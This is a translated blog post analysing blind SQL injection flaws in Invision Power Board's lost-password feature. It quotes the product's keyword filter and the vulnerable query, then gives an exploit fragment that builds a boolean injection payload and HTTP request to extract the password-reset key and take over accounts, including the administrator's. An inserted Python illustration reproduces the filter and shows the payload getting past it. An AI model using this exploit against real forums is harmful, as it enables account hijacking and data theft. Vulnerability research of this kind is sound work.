About the two recent injection vulnerabilities in IPB


5up3rh3iblog

For the vulnerability announcement, see: http://www.pcsec.org/archives/Invision-Power-Board-Blind-SQL-Injection-Vulnerability.html. It is obviously a double-encoding problem caused by urldecode(). I suspect the discoverer found it simply by grepping for urldecode...

What is strange is that this time I have not seen any foreigners release an exp. I have always been very enthusiastic about... so a friend asked me for an exp, and I passed the request on to someone else... After a few days of "you push me, I push him", flyhat finally sent me an exp, but I could not get it to run. When I asked, I learned that flyhat had been busy with work and it was the early hours of the morning, so he had written only the basic skeleton and sent it to me before testing. I had to check and modify it myself...

According to a rough analysis, exploiting the original vulnerability is not that simple, and there are quite a few snags in it. It seems there is a reason the foreigners have not released an exp:

// ips_kernel/classDbMysqliClient.php
// ips_kernel/classDbMysqlClient.php

if ( ! IPS_DB_ALLOW_SUB_SELECTS )
{
    # On the spot allowance?
    if ( ! $this->allow_sub_select )
    {
        $_tmp = strtolower( $this->_removeAllQuotes( $the_query ) );

        if ( preg_match( "#(?:/\*|\*/)#i", $_tmp ) )
        {
            $this->throwFatalError( "You are not allowed to use comments in your SQL query. Add ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them" );
            return false;
        }

        if ( preg_match( "#[^_a-zA-Z]union[^_a-zA-Z]#s", $_tmp ) )
        {
            $this->throwFatalError( "UNION query joins are not allowed. Add ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them" );
            return false;
        }
        else if ( preg_match_all( "#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches ) )
        {
            if ( count( $matches ) > 1 )
            {
                $this->throwFatalError( "sub select query joins are not allowed. Add ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them" );
                return false;
            }
        }
    }
}

So ipb's query() also carries an IDS of sorts: /**/ is not allowed, and union and select are checked too, judging from ipb's error messages. The intention is obvious: sub selects are not allowed by default.

// ips_kernel/classDb.php
define( 'IPS_DB_ALLOW_SUB_SELECTS', 0 );

The SQL statement of the first injection vulnerability is complicated and cannot be commented out with /*, so it is basically hard to exploit. The second vulnerability yields a relatively simple SQL injection statement:

/* Get validating info ..*/
$validate = $this->DB->buildAndFetch( array( 'select' => '*', 'from' => 'validating', 'where' => "member_id={$in_user_id} and vid={$in_validate_key} and lost_pass=1" ) );

`and 1=1` can be used to close off the trailing `and`. The point itself is a blind injection point, so a union is basically out of the question. The difficulty now is preg_match_all("#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches): if select is not allowed, there is no way to subquery other tables or databases, and I have not had time to study it. Is there any way to get past the select restriction and perform cross-table/database queries? [If you have any breakthrough, please let me know]...
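As an added illustration (not code from this page or from IPB), the following Python models the blacklist filter quoted above and the validating-table query, then shows how a parameterised lookup treats the same key value; the table layout and the hypothetical key 'demokey' are constructed for the demo.

```python
import re
import sqlite3

# Python re-implementation of the three blacklist checks from the IPB
# classDbMysqlClient.php excerpt above; the regexes are the PHP ones.
COMMENT_RE = re.compile(r"(?:/\*|\*/)")
UNION_RE = re.compile(r"[^_a-zA-Z]union[^_a-zA-Z]", re.S)
SELECT_RE = re.compile(r"[^_a-zA-Z](select)[^_a-zA-Z]", re.S)

def remove_all_quotes(query):
    """Simplified stand-in for IPB's _removeAllQuotes(): drop string literals."""
    return re.sub(r"'[^']*'|\"[^\"]*\"", "", query)

def ipb_sub_select_filter(query):
    """Return why the IPB filter would reject the query, or None if it passes.
    In the PHP original, count($matches) is the number of capture groups plus
    one (always 2), so any 'select' not at the very start is rejected."""
    tmp = remove_all_quotes(query).lower()
    if COMMENT_RE.search(tmp):
        return "comments"
    if UNION_RE.search(tmp):
        return "union"
    if SELECT_RE.search(tmp):
        return "sub select"
    return None

def lostpass_query_unsafe(in_user_id, in_validate_key):
    """The lostpass query as the page shows it: values interpolated into SQL."""
    return ("select * from validating where member_id=%s and vid=%s and lost_pass=1"
            % (in_user_id, in_validate_key))

def lostpass_lookup_safe(conn, in_user_id, in_validate_key):
    """Parameterised form: the key is bound as data and never parsed as SQL."""
    if not in_user_id.isdigit():
        return None
    cur = conn.execute(
        "select member_id, vid from validating where member_id=? and vid=? and lost_pass=1",
        (int(in_user_id), in_validate_key))
    return cur.fetchone()

def make_demo_db():
    """Constructed in-memory table with one pending lost-password record."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table validating(member_id integer, vid text, lost_pass integer)")
    conn.execute("insert into validating values (1, 'demokey', 1)")
    return conn

# The page's payload shape: a boolean test on vid with no comment, union or select.
BLIND_PAYLOAD = "x or if(ascii(substring(vid,1,1))=100,1=1,1=2) and 1=1"
```

The keyword blacklist passes the boolean payload untouched, while the bound parameter simply fails to match any row.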

Is there any other way to achieve a useful attack? There is still a way. This query runs against the validating table, and the vid in this table is the key generated by the lost-password function. If we obtain this key, we can change another user's password, including the administrator's....

I thought this exp was perfect, but as I continued analysing I found another problem: by default, ipb escapes again. ipb can reset a password in two modes. Either a random password is sent to the user's email [this is the default], or a user-defined password is submitted and set directly [see the public function lostPasswordValidate() in lostpass.php for the code]. Only if ipb uses the second method can we change another user's password and achieve the attack.....

Key fragment of exp:

$sql = "55512c93eda811273175c3e00002dec87 or if(ascii(substring(vid," . $j . ",1))=" . $i . ",1=1,1=2) and 1=1";
$packet  = "GET " . $path . "index.php?app=core&module=global&section=lostpass&do=sendform&uid=1&aid=" . urlencode($sql) . " HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";

Summary:

Default Security is very important !!!!

Finally, I would like to thank flyhat for his help ~~
